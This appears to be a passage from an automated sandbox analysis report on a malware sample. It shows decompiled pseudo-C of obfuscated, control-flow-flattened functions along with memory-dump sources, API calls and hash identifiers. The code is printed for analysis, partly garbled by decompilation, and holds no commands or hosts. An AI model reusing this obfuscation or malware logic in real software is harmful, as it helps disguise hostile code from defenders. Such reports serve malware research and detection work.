				_v20 = _v20 ^ 0x60bd1ab4;
				_v52 = 0x531ceb;
				_v52 = _v52 ^ 0x8fc4675a;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x23e32c7b;
				_v80 = 0xb054c0;
				_t228 = 0x5b;
				_v80 = _v80 / _t228;
				_v80 = _v80 << 1;
				_v80 = _v80 + 0xffffcecb;
				_v80 = _v80 ^ 0x0007d204;
				_v16 = 0x58f1c6;
				_v16 = _v16 ^ 0x8ee10e17;
				_v16 = _v16 ^ 0x8ebef1bd;
				_v68 = 0x312414;
				_t229 = 0x7b;
				_t233 = _v16;
				_v68 = _v68 / _t229;
				_v68 = _v68 + 0x1b34;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x00095176;
				_t197 = _v16;
				_t230 = _v16;
				_v72 = 0xc0cd63;
				_v72 = _v72 | 0x9a162f11;
				_v72 = _v72 << 3;
				_v72 = _v72 * 0x12;
				_v72 = _v72 ^ 0x18eea785;
				_v48 = 0xaed007;
				_v48 = _v48 ^ 0x406d7cc3;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x061a7dff;
				while(1) {
					L1:
					_t219 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t198 != 0x2c774a6) {
								if(_t198 == 0x3d69ab1) {
									_t198 = 0x526c216;
									continue;
								} else {
									if(_t198 == 0x4efcef6) {
										E0035E689(_v76, _v20, _v52, _t233, _v80);
										_t234 =  &(_t234[3]);
										_t198 = 0x2c774a6;
										goto L1;
									} else {
										if(_t198 == 0x526c216) {
											_t231 =  *0x36520c; // 0x0
											_t232 = _t231 + 0x220;
											while( *_t232 != _t219) {
												_t232 = _t232 + 2;
											}
											_t230 = _t232 + 2;
											_t198 = 0xb318200;
											goto L2;
										} else {
											if(_t198 == 0x54b01d8) {
												_t193 = E00342E96(_v56, _v24, _v28, _v60, _v32, _t230, _t197);
												_t234 =  &(_t234[5]);
												_t233 = _t193;
												_t191 = 0xe4f0407;
												_t198 =  !=  ? 0xe4f0407 : 0x2c774a6;
												_t219 = 0x5c;
												continue;
											} else {
												if(_t198 == 0xb318200) {
													_t194 = E0034EB36(_v84, _v36, _t198, _v40);
													_t197 = _t194;
													_t234 =  &(_t234[3]);
													if(_t194 != 0) {
														_t198 = 0x54b01d8;
														while(1) {
															L1:
															_t219 = 0x5c;
															goto L2;
														}
													}
												} else {
													if(_t198 != _t191) {
														goto L21;
													} else {
														E0034C67D(_t233, _v88, _v44, _v64);
														_t224 =  !=  ? 1 : _t224;
														_t198 = 0x4efcef6;
														while(1) {
															L1:
															_t219 = 0x5c;
															L2:
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E0035E689(_v16, _v68, _v72, _t197, _v48);
							_t234 =  &(_t234[3]);
							_t198 = 0xc9e12b8;
							_t191 = 0xe4f0407;
							_t219 = 0x5c;
							L21:
						} while (_t198 != 0xc9e12b8);
						L22:
						return _t224;
					}
				}
			}









































                                                                                                                      0x003504b8
                                                                                                                      0x003504bb
                                                                                                                      0x003504c5
                                                                                                                      0x003504cd
                                                                                                                      0x003504d6
                                                                                                                      0x003504d8
                                                                                                                      0x003504dc
                                                                                                                      0x003504e4
                                                                                                                      0x003504f3
                                                                                                                      0x003504f6
                                                                                                                      0x003504fa
                                                                                                                      0x00350502
                                                                                                                      0x0035050a
                                                                                                                      0x00350512
                                                                                                                      0x0035051a
                                                                                                                      0x00350522
                                                                                                                      0x00350532
                                                                                                                      0x0035053a
                                                                                                                      0x0035053f
                                                                                                                      0x00350545
                                                                                                                      0x0035054d
                                                                                                                      0x00350555
                                                                                                                      0x0035055d
                                                                                                                      0x00350565
                                                                                                                      0x0035056d
                                                                                                                      0x00350575
                                                                                                                      0x00350578
                                                                                                                      0x0035057c
                                                                                                                      0x00350584
                                                                                                                      0x00350591
                                                                                                                      0x00350595
                                                                                                                      0x0035059d
                                                                                                                      0x003505a5
                                                                                                                      0x003505ad
                                                                                                                      0x003505b5
                                                                                                                      0x003505c2
                                                                                                                      0x003505c6
                                                                                                                      0x003505ce
                                                                                                                      0x003505d6
                                                                                                                      0x003505db
                                                                                                                      0x003505e3
                                                                                                                      0x003505e8
                                                                                                                      0x003505f0
                                                                                                                      0x003505f8
                                                                                                                      0x00350600
                                                                                                                      0x00350608
                                                                                                                      0x00350610
                                                                                                                      0x00350618
                                                                                                                      0x0035061d
                                                                                                                      0x00350625
                                                                                                                      0x0035062d
                                                                                                                      0x00350635
                                                                                                                      0x0035063d
                                                                                                                      0x00350645
                                                                                                                      0x0035064d
                                                                                                                      0x00350655
                                                                                                                      0x0035065d
                                                                                                                      0x00350665
                                                                                                                      0x0035066d
                                                                                                                      0x00350675
                                                                                                                      0x0035067a
                                                                                                                      0x00350682
                                                                                                                      0x00350692
                                                                                                                      0x00350697
                                                                                                                      0x0035069d
                                                                                                                      0x003506a1
                                                                                                                      0x003506a9
                                                                                                                      0x003506b1
                                                                                                                      0x003506b9
                                                                                                                      0x003506c1
                                                                                                                      0x003506c9
                                                                                                                      0x003506d5
                                                                                                                      0x003506d8
                                                                                                                      0x003506dc
                                                                                                                      0x003506e0
                                                                                                                      0x003506e8
                                                                                                                      0x003506ed
                                                                                                                      0x003506f5
                                                                                                                      0x003506f9
                                                                                                                      0x003506fd
                                                                                                                      0x00350705
                                                                                                                      0x0035070d
                                                                                                                      0x00350717
                                                                                                                      0x0035071b
                                                                                                                      0x00350723
                                                                                                                      0x0035072b
                                                                                                                      0x00350733
                                                                                                                      0x00350738
                                                                                                                      0x00350740
                                                                                                                      0x00350740
                                                                                                                      0x00350742
                                                                                                                      0x00350743
                                                                                                                      0x00350743
                                                                                                                      0x00350748
                                                                                                                      0x00000000
                                                                                                                      0x00350748
                                                                                                                      0x0035075a
                                                                                                                      0x0035085a
                                                                                                                      0x00000000
                                                                                                                      0x00350760
                                                                                                                      0x00350766
                                                                                                                      0x00350848
                                                                                                                      0x0035084d
                                                                                                                      0x00350850
                                                                                                                      0x00000000
                                                                                                                      0x0035076c
                                                                                                                      0x00350772
                                                                                                                      0x00350814
                                                                                                                      0x0035081a
                                                                                                                      0x00350825
                                                                                                                      0x00350822
                                                                                                                      0x00350822
                                                                                                                      0x0035082a
                                                                                                                      0x0035082d
                                                                                                                      0x00000000
                                                                                                                      0x00350778
                                                                                                                      0x0035077e
                                                                                                                      0x003507f3
                                                                                                                      0x003507f8
                                                                                                                      0x003507fb
                                                                                                                      0x00350804
                                                                                                                      0x00350809
                                                                                                                      0x0035080e
                                                                                                                      0x00000000
                                                                                                                      0x00350780
                                                                                                                      0x00350786
                                                                                                                      0x003507c1
                                                                                                                      0x003507c6
                                                                                                                      0x003507c8
                                                                                                                      0x003507cd
                                                                                                                      0x003507d3
                                                                                                                      0x00350740
                                                                                                                      0x00350740
                                                                                                                      0x00350742
                                                                                                                      0x00000000
                                                                                                                      0x00350742
                                                                                                                      0x00350740
                                                                                                                      0x00350788
                                                                                                                      0x0035078a
                                                                                                                      0x00000000
                                                                                                                      0x00350790
                                                                                                                      0x0035079e
                                                                                                                      0x003507aa
                                                                                                                      0x003507ad
                                                                                                                      0x00350740
                                                                                                                      0x00350740
                                                                                                                      0x00350742
                                                                                                                      0x00350743
                                                                                                                      0x00000000
                                                                                                                      0x00350743
                                                                                                                      0x00350740
                                                                                                                      0x0035078a
                                                                                                                      0x00350786
                                                                                                                      0x0035077e
                                                                                                                      0x00350772
                                                                                                                      0x00350766
                                                                                                                      0x00000000
                                                                                                                      0x0035075a
                                                                                                                      0x00350875
                                                                                                                      0x0035087a
                                                                                                                      0x0035087d
                                                                                                                      0x00350882
                                                                                                                      0x00350889
                                                                                                                      0x0035088a
                                                                                                                      0x0035088a
                                                                                                                      0x00350896
                                                                                                                      0x0035089f
                                                                                                                      0x0035089f
                                                                                                                      0x00350743

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$CLN$`"$kaTz$ln$vQ${,#
                                                                                                                      • API String ID: 0-3310206870
                                                                                                                      • Opcode ID: 2381f7a3e759c712d3479b8a14bac4268eb055a4d087d06067afc2ba332a1968
                                                                                                                      • Instruction ID: 8400f3d9d8929b547a49555b07245e72195421200e5f5d5d82509756a476fb26
                                                                                                                      • Opcode Fuzzy Hash: 2381f7a3e759c712d3479b8a14bac4268eb055a4d087d06067afc2ba332a1968
                                                                                                                      • Instruction Fuzzy Hash: 27A154715083419FC359CF65C88981BFFF1FBD4798F50891EF99A96260D3B28A498F82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                      • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                        • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                      • String ID: LOC
                                                                                                                      • API String ID: 3864805678-519433814
                                                                                                                      • Opcode ID: 63ab523a9a2e3d371aaeed16ad9493fb6f1cf84d76bfa06aab66571a3b8646f3
                                                                                                                      • Instruction ID: 7277114792b78e9780c732931990dc2d47c5509fa80221895377f97ab4224877
                                                                                                                      • Opcode Fuzzy Hash: 63ab523a9a2e3d371aaeed16ad9493fb6f1cf84d76bfa06aab66571a3b8646f3
                                                                                                                      • Instruction Fuzzy Hash: B711E171900118AFDB12DB64CC46BDD73B8EF09315F1241A1F7059F0A2EEB0EA869AD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00359186 Relevance: 7.8, Strings: 6, Instructions: 330COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00359186(void* __ecx, void* __edx, intOrPtr _a8) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				void* _t336;
				void* _t361;
				intOrPtr _t365;
				intOrPtr _t367;
				void* _t371;
				intOrPtr _t373;
				intOrPtr _t376;
				void* _t386;
				void* _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int* _t439;

				_push(_a8);
				_t425 = 0;
				_push(0);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t336);
				_v1592 = 0xe90366;
				_t439 =  &(( &_v1704)[4]);
				_v1592 = _v1592 | 0xd8b262de;
				_v1592 = _v1592 ^ 0xd8fb63d7;
				_t386 = 0x283f0d8;
				_v1624 = 0xa39629;
				_v1624 = _v1624 >> 4;
				_t426 = 0x2c;
				_v1624 = _v1624 / _t426;
				_v1624 = _v1624 ^ 0x000bae79;
				_v1600 = 0xef5a7d;
				_t19 =  &_v1600; // 0xef5a7d
				_t427 = 0x1f;
				_v1600 =  *_t19 / _t427;
				_v1600 = _v1600 ^ 0x000c380d;
				_v1568 = 0xec630a;
				_t28 =  &_v1568; // 0xec630a
				_t428 = 0x1c;
				_v1568 =  *_t28 / _t428;
				_v1568 = _v1568 ^ 0x0002d50e;
				_v1668 = 0x697ac4;
				_v1668 = _v1668 ^ 0x43408629;
				_v1668 = _v1668 << 4;
				_v1668 = _v1668 << 0xf;
				_v1668 = _v1668 ^ 0xe763f227;
				_v1692 = 0xf5db19;
				_v1692 = _v1692 ^ 0xaa29ad2f;
				_v1692 = _v1692 >> 0xe;
				_v1692 = _v1692 << 6;
				_v1692 = _v1692 ^ 0x00a75d57;
				_v1620 = 0x9b43e;
				_v1620 = _v1620 >> 0xa;
				_v1620 = _v1620 + 0x190a;
				_v1620 = _v1620 ^ 0x0005a1ac;
				_v1572 = 0xd92c9a;
				_v1572 = _v1572 << 0xc;
				_v1572 = _v1572 ^ 0x92c3ac8e;
				_v1700 = 0x6f30ff;
				_v1700 = _v1700 << 0xe;
				_t429 = 0x26;
				_v1700 = _v1700 / _t429;
				_v1700 = _v1700 >> 0xe;
				_v1700 = _v1700 ^ 0x0006fa3f;
				_v1684 = 0x78d9c1;
				_v1684 = _v1684 * 0x25;
				_v1684 = _v1684 | 0x77a8ffeb;
				_v1684 = _v1684 ^ 0x77fd8a30;
				_v1656 = 0xa4e4c6;
				_v1656 = _v1656 + 0xa942;
				_v1656 = _v1656 + 0xffff73ad;
				_v1656 = _v1656 ^ 0x00a1f1ac;
				_v1652 = 0x64ed51;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 * 0x5c;
				_v1652 = _v1652 ^ 0x00034dfd;
				_v1580 = 0x83183a;
				_v1580 = _v1580 ^ 0x32eb2c8f;
				_v1580 = _v1580 ^ 0x326d5fbf;
				_v1564 = 0x95c9ec;
				_v1564 = _v1564 >> 6;
				_v1564 = _v1564 ^ 0x0008f372;
				_v1588 = 0xb1660f;
				_v1588 = _v1588 + 0x4492;
				_v1588 = _v1588 ^ 0x00bbacbc;
				_v1676 = 0x88aa71;
				_v1676 = _v1676 << 0xd;
				_v1676 = _v1676 | 0x03baa1bf;
				_v1676 = _v1676 << 6;
				_v1676 = _v1676 ^ 0xffa89651;
				_v1632 = 0x868f26;
				_v1632 = _v1632 << 1;
				_v1632 = _v1632 + 0xffffb6b3;
				_v1632 = _v1632 ^ 0x010eb46f;
				_v1640 = 0xd64df9;
				_v1640 = _v1640 >> 6;
				_t430 = 0x32;
				_v1640 = _v1640 / _t430;
				_v1640 = _v1640 ^ 0x000ccd63;
				_v1664 = 0x22c79e;
				_t431 = 0xf;
				_v1664 = _v1664 * 9;
				_v1664 = _v1664 << 0xa;
				_v1664 = _v1664 ^ 0x4da35e74;
				_v1664 = _v1664 ^ 0xa9bd4987;
				_v1696 = 0xf7f994;
				_v1696 = _v1696 >> 0xf;
				_v1696 = _v1696 << 7;
				_v1696 = _v1696 + 0xffff3f9d;
				_v1696 = _v1696 ^ 0x000a4602;
				_v1648 = 0xefbcda;
				_v1648 = _v1648 | 0xaae2c2a8;
				_v1648 = _v1648 + 0x86a3;
				_v1648 = _v1648 ^ 0xaafdd76e;
				_v1680 = 0x28593a;
				_v1680 = _v1680 >> 4;
				_v1680 = _v1680 | 0x0bfc0be2;
				_v1680 = _v1680 + 0x55be;
				_v1680 = _v1680 ^ 0x0bf8c584;
				_v1596 = 0xd047d1;
				_v1596 = _v1596 | 0xaa1708a2;
				_v1596 = _v1596 ^ 0xaad8bb32;
				_v1604 = 0xf2c56f;
				_v1604 = _v1604 << 6;
				_v1604 = _v1604 ^ 0x3cb75693;
				_v1644 = 0x36719;
				_v1644 = _v1644 ^ 0x56bc0977;
				_t432 = 7;
				_v1644 = _v1644 / _t431;
				_v1644 = _v1644 ^ 0x05c6baf7;
				_v1672 = 0x1a4ba5;
				_v1672 = _v1672 << 2;
				_v1672 = _v1672 / _t432;
				_v1672 = _v1672 >> 2;
				_v1672 = _v1672 ^ 0x0008f53b;
				_v1628 = 0xe04a84;
				_v1628 = _v1628 | 0x71ddf7de;
				_v1628 = _v1628 + 0xd6a7;
				_v1628 = _v1628 ^ 0x71f84a11;
				_v1688 = 0xb42ba6;
				_t433 = 0x24;
				_v1688 = _v1688 / _t433;
				_v1688 = _v1688 | 0x51e7f8f6;
				_v1688 = _v1688 << 0xb;
				_v1688 = _v1688 ^ 0x3fc44495;
				_v1704 = 0x876d58;
				_v1704 = _v1704 + 0x4bbd;
				_v1704 = _v1704 ^ 0xe392f1ca;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 ^ 0x62a598c6;
				_v1636 = 0x545e02;
				_v1636 = _v1636 + 0xcb63;
				_v1636 = _v1636 << 5;
				_v1636 = _v1636 ^ 0x0aae6d2b;
				_v1612 = 0x26c885;
				_v1612 = _v1612 | 0x5f90e8de;
				_t434 = 0x66;
				_v1612 = _v1612 * 0x52;
				_v1612 = _v1612 ^ 0xa89ce640;
				_v1576 = 0x171d42;
				_v1576 = _v1576 ^ 0x4acb7e15;
				_v1576 = _v1576 ^ 0x4adecc08;
				_v1660 = 0xcbbc2;
				_v1660 = _v1660 >> 8;
				_v1660 = _v1660 / _t434;
				_v1660 = _v1660 ^ 0x3398a9eb;
				_v1660 = _v1660 ^ 0x33921795;
				_v1608 = 0x5e75bf;
				_v1608 = _v1608 + 0xa7f5;
				_v1608 = _v1608 >> 1;
				_v1608 = _v1608 ^ 0x002982b8;
				_v1584 = 0x10acd4;
				_v1584 = _v1584 + 0x75ec;
				_v1584 = _v1584 ^ 0x001a134d;
				_v1616 = 0x7387ff;
				_v1616 = _v1616 | 0x122d515f;
				_v1616 = _v1616 + 0xffffa5db;
				_v1616 = _v1616 ^ 0x12702e1c;
				L1:
				while(_t386 != 0x283f0d8) {
					if(_t386 == 0xc593167) {
						_push(_v1700);
						_push(_v1572);
						_push(0x3410fc);
						_t361 = E0034AB66(_v1692, _v1620, __eflags);
						E0035C66E( &_v1560, __eflags);
						_t365 =  *0x36520c; // 0x0
						_t367 =  *0x36520c; // 0x0
						E0035BDB5( &_v520, __eflags, _v1684, _v1656, _v1652, _v1580, _t367 + 0x220, _v1564, _v1588, _t365 + 8,  &_v1560,  &_v1040, _t361);
						E0034AE03(_v1676, _v1632, _v1640, _t361);
						_t439 =  &(_t439[0x10]);
						L8:
						_t386 = 0xe92714c;
						continue;
					}
					if(_t386 == 0xd2f347e) {
						_push(_v1680);
						_push(_v1648);
						_push(0x34121c);
						_t371 = E0034AB66(_v1664, _v1696, __eflags);
						E0035C66E( &_v1560, __eflags);
						_t373 =  *0x36520c; // 0x0
						_t376 =  *0x36520c; // 0x0
						__eflags = 0;
						E00345F83(_v1596, 0, _v1604,  &_v520,  &_v1560, _v1644, _v1672,  &_v1560, _t376 + 0x220, _v1628,  &_v1040, _t373 + 8, _v1688, _t371);
						E0034AE03(_v1704, _v1636, _v1612, _t371);
						_t439 =  &(_t439[0x11]);
						goto L8;
					}
					if(_t386 == 0xe92714c) {
						_push(_v1616);
						_push(_v1584);
						_push(_v1608);
						_push(_t425);
						_push(_t425);
						_push(_v1660);
						_push(_t386);
						_push(_t425);
						__eflags = E00349700( &_v520, _v1576, __eflags);
						_t425 =  !=  ? 1 : _t425;
					} else {
						if(_t386 != 0x3c91f62) {
							continue;
						} else {
						}
					}
					return _t425;
				}
				_push(_t386);
				E0034EA7B( &_v1040, _v1624, _v1592, _t386, _v1600, _v1568, _v1668);
				_t439 =  &(_t439[7]);
				_t386 = 0xc593167;
				goto L1;
			}





























































                                                                                                                      0x00359190
                                                                                                                      0x00359197
                                                                                                                      0x00359199
                                                                                                                      0x0035919a
                                                                                                                      0x0035919b
                                                                                                                      0x0035919c
                                                                                                                      0x003591a1
                                                                                                                      0x003591ac
                                                                                                                      0x003591af
                                                                                                                      0x003591bc
                                                                                                                      0x003591c7
                                                                                                                      0x003591cc
                                                                                                                      0x003591d4
                                                                                                                      0x003591df
                                                                                                                      0x003591e4
                                                                                                                      0x003591ea
                                                                                                                      0x003591f2
                                                                                                                      0x003591fa
                                                                                                                      0x003591fe
                                                                                                                      0x00359203
                                                                                                                      0x00359209
                                                                                                                      0x00359211
                                                                                                                      0x0035921c
                                                                                                                      0x00359223
                                                                                                                      0x00359228
                                                                                                                      0x00359231
                                                                                                                      0x0035923c
                                                                                                                      0x00359244
                                                                                                                      0x0035924c
                                                                                                                      0x00359251
                                                                                                                      0x00359256
                                                                                                                      0x0035925e
                                                                                                                      0x00359266
                                                                                                                      0x0035926e
                                                                                                                      0x00359273
                                                                                                                      0x00359278
                                                                                                                      0x00359280
                                                                                                                      0x00359288
                                                                                                                      0x0035928d
                                                                                                                      0x00359295
                                                                                                                      0x0035929d
                                                                                                                      0x003592a8
                                                                                                                      0x003592b0
                                                                                                                      0x003592bb
                                                                                                                      0x003592c3
                                                                                                                      0x003592cc
                                                                                                                      0x003592cf
                                                                                                                      0x003592d3
                                                                                                                      0x003592d8
                                                                                                                      0x003592e0
                                                                                                                      0x003592ed
                                                                                                                      0x003592f1
                                                                                                                      0x003592f9
                                                                                                                      0x00359301
                                                                                                                      0x00359309
                                                                                                                      0x00359311
                                                                                                                      0x00359319
                                                                                                                      0x00359321
                                                                                                                      0x00359329
                                                                                                                      0x00359333
                                                                                                                      0x00359337
                                                                                                                      0x0035933f
                                                                                                                      0x0035934c
                                                                                                                      0x00359357
                                                                                                                      0x00359362
                                                                                                                      0x0035936d
                                                                                                                      0x00359375
                                                                                                                      0x00359380
                                                                                                                      0x0035938b
                                                                                                                      0x00359396
                                                                                                                      0x003593a1
                                                                                                                      0x003593a9
                                                                                                                      0x003593ae
                                                                                                                      0x003593b6
                                                                                                                      0x003593bb
                                                                                                                      0x003593c3
                                                                                                                      0x003593cb
                                                                                                                      0x003593cf
                                                                                                                      0x003593d7
                                                                                                                      0x003593df
                                                                                                                      0x003593e7
                                                                                                                      0x003593f2
                                                                                                                      0x003593f7
                                                                                                                      0x003593fd
                                                                                                                      0x00359405
                                                                                                                      0x00359412
                                                                                                                      0x00359415
                                                                                                                      0x00359419
                                                                                                                      0x0035941e
                                                                                                                      0x00359426
                                                                                                                      0x0035942e
                                                                                                                      0x00359436
                                                                                                                      0x0035943b
                                                                                                                      0x00359440
                                                                                                                      0x00359448
                                                                                                                      0x00359450
                                                                                                                      0x00359458
                                                                                                                      0x00359460
                                                                                                                      0x00359468
                                                                                                                      0x00359470
                                                                                                                      0x00359478
                                                                                                                      0x0035947d
                                                                                                                      0x00359485
                                                                                                                      0x0035948d
                                                                                                                      0x00359495
                                                                                                                      0x003594a0
                                                                                                                      0x003594ab
                                                                                                                      0x003594b6
                                                                                                                      0x003594be
                                                                                                                      0x003594c3
                                                                                                                      0x003594cb
                                                                                                                      0x003594d3
                                                                                                                      0x003594e1
                                                                                                                      0x003594e2
                                                                                                                      0x003594e8
                                                                                                                      0x003594f0
                                                                                                                      0x003594f8
                                                                                                                      0x00359505
                                                                                                                      0x00359509
                                                                                                                      0x0035950e
                                                                                                                      0x00359516
                                                                                                                      0x0035951e
                                                                                                                      0x00359526
                                                                                                                      0x0035952e
                                                                                                                      0x00359538
                                                                                                                      0x00359544
                                                                                                                      0x00359549
                                                                                                                      0x0035954f
                                                                                                                      0x0035955c
                                                                                                                      0x00359566
                                                                                                                      0x0035956e
                                                                                                                      0x00359576
                                                                                                                      0x0035957e
                                                                                                                      0x00359586
                                                                                                                      0x0035958b
                                                                                                                      0x00359593
                                                                                                                      0x0035959b
                                                                                                                      0x003595a3
                                                                                                                      0x003595a8
                                                                                                                      0x003595b0
                                                                                                                      0x003595b8
                                                                                                                      0x003595c5
                                                                                                                      0x003595c6
                                                                                                                      0x003595ca
                                                                                                                      0x003595d2
                                                                                                                      0x003595dd
                                                                                                                      0x003595e8
                                                                                                                      0x003595f3
                                                                                                                      0x003595fb
                                                                                                                      0x00359606
                                                                                                                      0x0035960a
                                                                                                                      0x00359612
                                                                                                                      0x0035961a
                                                                                                                      0x00359622
                                                                                                                      0x0035962a
                                                                                                                      0x0035962e
                                                                                                                      0x00359636
                                                                                                                      0x00359641
                                                                                                                      0x0035964c
                                                                                                                      0x00359657
                                                                                                                      0x0035965f
                                                                                                                      0x00359667
                                                                                                                      0x0035966f
                                                                                                                      0x00000000
                                                                                                                      0x00359677
                                                                                                                      0x00359685
                                                                                                                      0x00359748
                                                                                                                      0x0035974c
                                                                                                                      0x0035975b
                                                                                                                      0x00359760
                                                                                                                      0x0035976e
                                                                                                                      0x00359789
                                                                                                                      0x003597a7
                                                                                                                      0x003597c5
                                                                                                                      0x003597dd
                                                                                                                      0x003597e2
                                                                                                                      0x00359741
                                                                                                                      0x00359741
                                                                                                                      0x00000000
                                                                                                                      0x00359741
                                                                                                                      0x00359691
                                                                                                                      0x003596a8
                                                                                                                      0x003596ac
                                                                                                                      0x003596b8
                                                                                                                      0x003596bd
                                                                                                                      0x003596ce
                                                                                                                      0x003596d8
                                                                                                                      0x003596ed
                                                                                                                      0x0035971f
                                                                                                                      0x00359721
                                                                                                                      0x00359739
                                                                                                                      0x0035973e
                                                                                                                      0x00000000
                                                                                                                      0x0035973e
                                                                                                                      0x00359695
                                                                                                                      0x0035981f
                                                                                                                      0x00359823
                                                                                                                      0x0035982a
                                                                                                                      0x0035982e
                                                                                                                      0x0035982f
                                                                                                                      0x00359830
                                                                                                                      0x0035983b
                                                                                                                      0x0035983c
                                                                                                                      0x0035984f
                                                                                                                      0x00359851
                                                                                                                      0x0035969b
                                                                                                                      0x003596a1
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003596a3
                                                                                                                      0x003596a1
                                                                                                                      0x00359860
                                                                                                                      0x00359860
                                                                                                                      0x003597ea
                                                                                                                      0x00359810
                                                                                                                      0x00359815
                                                                                                                      0x00359818
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: c$:Y($Qd$}Z$~4/$u
                                                                                                                      • API String ID: 0-1069939785
                                                                                                                      • Opcode ID: c56b8f86bbdd4bc008ed56617d18f69b619c8e91804e0b9591005395d4c25b24
                                                                                                                      • Instruction ID: c88809acbc80aabe045d9556e178b0e629724cd45b8f1e835153cc211c775e06
                                                                                                                      • Opcode Fuzzy Hash: c56b8f86bbdd4bc008ed56617d18f69b619c8e91804e0b9591005395d4c25b24
                                                                                                                      • Instruction Fuzzy Hash: D8F10F725083809FD369CF21C94AA9BBBE1FBC5748F10891DF6DA96220D7B58909CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00342830 Relevance: 7.8, Strings: 6, Instructions: 270COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00342830() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				unsigned int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				void* _t307;
				void* _t311;
				void* _t312;
				void* _t314;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
